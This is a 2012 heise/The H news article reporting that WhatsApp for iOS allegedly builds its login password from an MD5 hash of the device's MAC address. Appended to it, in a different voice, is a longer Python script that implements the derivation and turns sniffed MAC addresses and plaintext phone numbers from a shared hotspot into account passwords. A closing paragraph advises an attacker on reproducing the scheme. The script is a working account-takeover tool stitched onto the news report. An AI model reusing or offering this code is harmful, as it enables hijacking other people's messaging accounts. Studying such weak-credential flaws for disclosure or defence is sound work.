In association with heise online

12 September 2012, 09:27

WhatsApp allegedly creates overly simple passwords under iOS too


The iOS version of WhatsApp, the popular app-based alternative to texting, is, like the Android version of the application, also using a primitive method to generate its log-in password. According to a post on an Italian blog, the iOS client simply concatenates the Wi-Fi interface's MAC address with itself and takes the MD5 hash of the result: md5(AA:BB:CC:DD:EE:FFAA:BB:CC:DD:EE:FF).

To back this up, the author provides an excerpt from the iPhone app's disassembled code. If the allegation holds, the author has found a serious security problem: WhatsApp authenticates users with nothing more than their phone number and this automatically generated password. If the app is used on, for example, a public hotspot, other users of the same Wi-Fi network could easily obtain both values, and potentially even take permanent control of the account.

The MAC address is visible to every other station on a Wi-Fi network anyway, and a test by The H's associates at heise Security has shown that transferred messages still carry the user's phone number in plain text, despite the recently introduced message encryption. Under Android, WhatsApp derives the password from the smartphone's IMEI number rather than from the Wi-Fi MAC address.
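The derivation quoted above, and the resulting attack chain on a shared hotspot, as an added example (not code from WhatsApp or from the cited blog post). It implements the iOS formula exactly as the article states it, md5 of the MAC address written twice in upper-case colon notation; that the client hashes precisely that notation is an assumption, and the Android variant is not implemented because the page does not give its formula beyond "uses the IMEI". The MAC addresses and phone numbers are constructed sample data, and the phone number is taken as an already-extracted string since the page does not describe the message format.

```python
"""Added example: the MAC-derived WhatsApp-for-iOS password described in the
article, what a fellow hotspot user can compute from it, and what a sound
per-device secret looks like by contrast. Sample data is constructed."""

import hashlib
import re
import secrets

MAC_HEX_LEN = 12  # a 48-bit MAC address is 12 hex digits


def md5_hex(data: str) -> str:
    """Lower-case hex MD5 of an ASCII string."""
    return hashlib.md5(data.encode("ascii")).hexdigest()


def normalise_mac(mac: str) -> str:
    """Canonicalise common MAC notations ("aa-bb-cc-dd-ee-ff",
    "aabb.ccdd.eeff", "AA:BB:CC:DD:EE:FF") to the upper-case colon form
    shown in the blog excerpt. Assumption: the client hashes exactly that
    form; a different separator or case would yield a different digest."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != MAC_HEX_LEN:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, MAC_HEX_LEN, 2)).upper()


def ios_password_from_mac(mac: str) -> str:
    """Password as the article describes it for the iOS client:
    md5(MAC + MAC), i.e. md5("AA:BB:CC:DD:EE:FFAA:BB:CC:DD:EE:FF")."""
    canonical = normalise_mac(mac)
    return md5_hex(canonical + canonical)


def credentials_from_hotspot(observations):
    """What another user of the same Wi-Fi network can compute.

    `observations` is an iterable of (src_mac, phone_number) pairs: the
    source MAC of a station's 802.11 frames (visible to everyone in radio
    range) and the plain-text phone number the article says the messages
    carry (taken here as an already-parsed string, since the page does not
    describe the message format). Returns {phone_number: password}.
    No secret of any kind is needed to fill this table."""
    creds = {}
    for src_mac, number in observations:
        creds[number] = ios_password_from_mac(src_mac)
    return creds


def generate_device_password() -> str:
    """Contrast: a per-installation secret from the OS CSPRNG. 128 random
    bits cannot be recomputed from anything observable on the network,
    which is exactly the property the MAC-derived scheme lacks."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    # Constructed sample: two phones sharing a public hotspot.
    sniffed = [
        ("02:00:5e:10:00:01", "+391234567890"),
        ("02-00-5E-10-00-02", "+491234567890"),
    ]
    for number, password in credentials_from_hotspot(sniffed).items():
        print(f"{number}: password {password}")
```

The normalisation step is the practical caveat: the digest depends on the exact string that is hashed, so an attacker reproducing the scheme has to match the client's formatting, which is why the function canonicalises every input to the one form the disassembly shows.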

